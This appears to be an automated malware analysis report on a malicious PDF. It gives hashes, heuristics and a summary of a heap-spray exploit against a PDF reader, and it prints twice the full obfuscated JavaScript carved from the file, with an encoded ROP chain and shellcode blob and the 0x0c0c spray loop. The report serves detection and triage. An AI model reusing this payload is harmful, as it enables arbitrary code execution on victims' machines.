Malicious PDF — malware analysis report

Static analysis result for SHA-256 7dd3988bf51a0f19…

MALICIOUS

PDF

53.8 KB First seen: 2026-05-10
MD5: 6aa208c247563545e548a1bf65383c22 SHA-1: 784046916e9676c5ce76b7b2346d2fb73b777f6a SHA-256: 7dd3988bf51a0f19d41b233e2a10d0d37ab6e8bdd6ff2dd8cd62f68bc58d1d61
76 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution

The PDF file contains embedded JavaScript that utilizes the `unescape` function and appears to be involved in a heap spray technique. This JavaScript is likely intended to exploit a vulnerability within the PDF reader, potentially leading to arbitrary code execution. The presence of XFA form elements and the ML classifier's high confidence further support a malicious classification.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 5

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.bitstream.com In PDF document text
    • http://ns.adobe.com/xdp/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xci/2.6/Referenced by PDF JavaScript
    • http://www.xfa.org/schema/xfa-template/2.6/Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3C2 4027 bytes
SHA-256: 3ddf3130c8895494e34c8c3b2708843e4bb44808e7564fb0295df9e5f6d0a8c2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
8 of 12 identifiers look randomly generated (e.g. 'nrBMVTQIYTjSsKAEHrgmfiDLzFDtKQHPyjICnAFL') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var hgKjoMbJhYtXmlEkRgwFsBPsPvawy = unescape;
var hwFvOwZUMnKLzVjDiTlyfAdBwkFktjsCVrCVHWrwMQDWovDTWUPZJBAlZSEKXYlaOVagWuhtQNvvPaGjWPguW = hgKjoMbJhYtXmlEkRgwFsBPsPvawy( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc931%u49b1%ua3b8%u6df8%udd1f%ud9c5%u2474%u5ef4%u4631%u8310%u04c6%u4603%u410c%u910d%u0cf7%u6aee%u6e08%u8f66%ubc39%udb1c%u7068%u8956%ufb80%u3a3a%u8912%u4d92%u2793%u60c5%u8624%u2fc9%u89e6%u2db5%u693b%ufd87%u684e%ue0c0%u38a1%u6f99%uac13%u32ae%ucda8%u3960%ub590%ufe05%u0f65%u2f07%u04d5%ud74f%u425d%ue670%u91b2%ua14c%u61bf%u3026%ub816%u02c7%u1656%uaaf6%u675b%u0c3e%u1284%u6e34%u2439%u0c8f%ua1e5%ub612%u116e%u46f7%uc7a2%u447c%u8c0f%u49db%u418e%u7550%u641b%uffb7%u425f%u5b13%ueb3b%u0102%u14ea%ued54%ub053%u1c1e%uc287%u497c%uf864%u897e%u8be2%ubb0d%u27ad%uf79a%ue126%uf75d%u551c%u06f1%ua59f%uccdb%uf5cb%ue473%u9e73%u0983%u30a6%ua5d4%uf019%u0584%u98ca%u89ce%ub835%u43f0%u525e%u040a%ua36b%ue615%ua103%u1715%u2c88%u7df3%u7820%ue9ab%u21d9%u8b27%ufc26%u8b4d%uf2ad%u42b2%u7f46%u33a1%ucaa6%u929b%ue1b9%u1ab6%u0d2c%u4c11%u0fd8%uba44%uf047%ub0a3%u644e%uaf0c%u68ae%u2f8c%ue2f9%u478c%u565d%u72df%u43a2%u2f73%u6b37%u8322%u0390%ufac8%u8cd7%u2933%uf1e6%u14e5%u036c%u7480%u41ac' );
var KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur = hgKjoMbJhYtXmlEkRgwFsBPsPvawy( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur.length + 20 + 8 < 65536) KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur+=KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur;
wMYyqksFmBCwZXAYzgljSOuGzZbKa = KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur.substring(0, (0x0c0c-0x24)/2);
wMYyqksFmBCwZXAYzgljSOuGzZbKa += hwFvOwZUMnKLzVjDiTlyfAdBwkFktjsCVrCVHWrwMQDWovDTWUPZJBAlZSEKXYlaOVagWuhtQNvvPaGjWPguW;
wMYyqksFmBCwZXAYzgljSOuGzZbKa += KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur;
OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS = wMYyqksFmBCwZXAYzgljSOuGzZbKa.substring(0, 65536/2);
while(OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS.length < 0x80000) OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS += OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS;
EcteVxrRdVOByoiaJdhqgdeDadYO = OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS.substring(0, 0x80000 - (0x1020-0x08) / 2);
var nrBMVTQIYTjSsKAEHrgmfiDLzFDtKQHPyjICnAFLIWLIcWAxbkSyKEJBOjabIEOQOrCryoQkqzonfqnStHmhrihqtCDyItHuA = new Array();
for (wRRzfRsRKKsRBTckqJSnmVBqLcwQBXqPfhGMdjtoEpqBtPPAUraIMfWKjYCuoT=0;wRRzfRsRKKsRBTckqJSnmVBqLcwQBXqPfhGMdjtoEpqBtPPAUraIMfWKjYCuoT<0x1f0;wRRzfRsRKKsRBTckqJSnmVBqLcwQBXqPfhGMdjtoEpqBtPPAUraIMfWKjYCuoT++) nrBMVTQIYTjSsKAEHrgmfiDLzFDtKQHPyjICnAFLIWLIcWAxbkSyKEJBOjabIEOQOrCryoQkqzonfqnStHmhrihqtCDyItHuA[wRRzfRsRKKsRBTckqJSnmVBqLcwQBXqPfhGMdjtoEpqBtPPAUraIMfWKjYCuoT]=EcteVxrRdVOByoiaJdhqgdeDadYO+"s";
javascript_obj0012_001.js pdf-javascript-stream PDF /JS object 12 at offset 0xC3E4 4913 bytes
SHA-256: a106a53b0727c4708073ec6abc5e931733d24cde180fd701f36359945f51d676
Preview script
First 1,000 lines of the extracted script
var hgKjoMbJhYtXmlEkRgwFsBPsPvawy = unescape;
var hwFvOwZUMnKLzVjDiTlyfAdBwkFktjsCVrCVHWrwMQDWovDTWUPZJBAlZSEKXYlaOVagWuhtQNvvPaGjWPguW = hgKjoMbJhYtXmlEkRgwFsBPsPvawy( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc931%u49b1%ua3b8%u6df8%udd1f%ud9c5%u2474%u5ef4%u4631%u8310%u04c6%u4603%u410c%u910d%u0cf7%u6aee%u6e08%u8f66%ubc39%udb1c%u7068%u8956%ufb80%u3a3a%u8912%u4d92%u2793%u60c5%u8624%u2fc9%u89e6%u2db5%u693b%ufd87%u684e%ue0c0%u38a1%u6f99%uac13%u32ae%ucda8%u3960%ub590%ufe05%u0f65%u2f07%u04d5%ud74f%u425d%ue670%u91b2%ua14c%u61bf%u3026%ub816%u02c7%u1656%uaaf6%u675b%u0c3e%u1284%u6e34%u2439%u0c8f%ua1e5%ub612%u116e%u46f7%uc7a2%u447c%u8c0f%u49db%u418e%u7550%u641b%uffb7%u425f%u5b13%ueb3b%u0102%u14ea%ued54%ub053%u1c1e%uc287%u497c%uf864%u897e%u8be2%ubb0d%u27ad%uf79a%ue126%uf75d%u551c%u06f1%ua59f%uccdb%uf5cb%ue473%u9e73%u0983%u30a6%ua5d4%uf019%u0584%u98ca%u89ce%ub835%u43f0%u525e%u040a%ua36b%ue615%ua103%u1715%u2c88%u7df3%u7820%ue9ab%u21d9%u8b27%ufc26%u8b4d%uf2ad%u42b2%u7f46%u33a1%ucaa6%u929b%ue1b9%u1ab6%u0d2c%u4c11%u0fd8%uba44%uf047%ub0a3%u644e%uaf0c%u68ae%u2f8c%ue2f9%u478c%u565d%u72df%u43a2%u2f73%u6b37%u8322%u0390%ufac8%u8cd7%u2933%uf1e6%u14e5%u036c%u7480%u41ac' );
var KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur = hgKjoMbJhYtXmlEkRgwFsBPsPvawy( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
while (KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur.length + 20 + 8 < 65536) KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur+=KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur;
wMYyqksFmBCwZXAYzgljSOuGzZbKa = KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur.substring(0, (0x0c0c-0x24)/2);
wMYyqksFmBCwZXAYzgljSOuGzZbKa += hwFvOwZUMnKLzVjDiTlyfAdBwkFktjsCVrCVHWrwMQDWovDTWUPZJBAlZSEKXYlaOVagWuhtQNvvPaGjWPguW;
wMYyqksFmBCwZXAYzgljSOuGzZbKa += KseUeyRHWlnURGEaTBjbgiulmQfdvFgXWfipTvehyBxqbVzRvwGzBhqCdtUGNuSeqvFBbWhgCCeAESgCYZGTVcyqgQtsur;
OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS = wMYyqksFmBCwZXAYzgljSOuGzZbKa.substring(0, 65536/2);
while(OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS.length < 0x80000) OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS += OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS;
EcteVxrRdVOByoiaJdhqgdeDadYO = OzosfLnedGxTWmVzUsxoIWUUNAIsWQikiVQVaZRYtysJAnRSoSDYnpOHRSS.substring(0, 0x80000 - (0x1020-0x08) / 2);
var nrBMVTQIYTjSsKAEHrgmfiDLzFDtKQHPyjICnAFLIWLIcWAxbkSyKEJBOjabIEOQOrCryoQkqzonfqnStHmhrihqtCDyItHuA = new Array();
for (wRRzfRsRKKsRBTckqJSnmVBqLcwQBXqPfhGMdjtoEpqBtPPAUraIMfWKjYCuoT=0;wRRzfRsRKKsRBTckqJSnmVBqLcwQBXqPfhGMdjtoEpqBtPPAUraIMfWKjYCuoT<0x1f0;wRRzfRsRKKsRBTckqJSnmVBqLcwQBXqPfhGMdjtoEpqBtPPAUraIMfWKjYCuoT++) nrBMVTQIYTjSsKAEHrgmfiDLzFDtKQHPyjICnAFLIWLIcWAxbkSyKEJBOjabIEOQOrCryoQkqzonfqnStHmhrihqtCDyItHuA[wRRzfRsRKKsRBTckqJSnmVBqLcwQBXqPfhGMdjtoEpqBtPPAUraIMfWKjYCuoT]=EcteVxrRdVOByoiaJdhqgdeDadYO+"s";

endstream
endobj
13 0 obj 
<</XFA 14 0 R>>
endobj
14 0 obj 
<</Length 435>>
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
  <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    <present>
      <pdf>
        <interactive>1</interactive>
      </pdf>
    </present>
  </config>
  <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    <subform name="form1" layout="tb" locale="en_US">
      <pageSet>
      </pageSet>
    </subform>
  </template>
</xdp:xdp>

endstream
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000101 00000 n
0000000192 00000 n
0000000222 00000 n
0000000256 00000 n
0000000355 00000 n
0000000387 00000 n
0000000527 00000 n
0000000649 00000 n
0000000766 00000 n
0000050057 00000 n
0000050114 00000 n
0000054193 00000 n
0000054226 00000 n
trailer
<</Size 15/Root 1 0 R>>
startxref
54712
%%EOF
font_00_sfnt_off0000032f.bin pdf-font-stream PDF embedded font (sfnt) at offset 0x32F 49224 bytes
SHA-256: e6158e60ffa01d3aaa5c48d19f4333dc8919ea17d7b7202cf5b159279fb25a56
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: heap spray 0x0C

Open this report in the interactive analyzer, or submit your own file for analysis.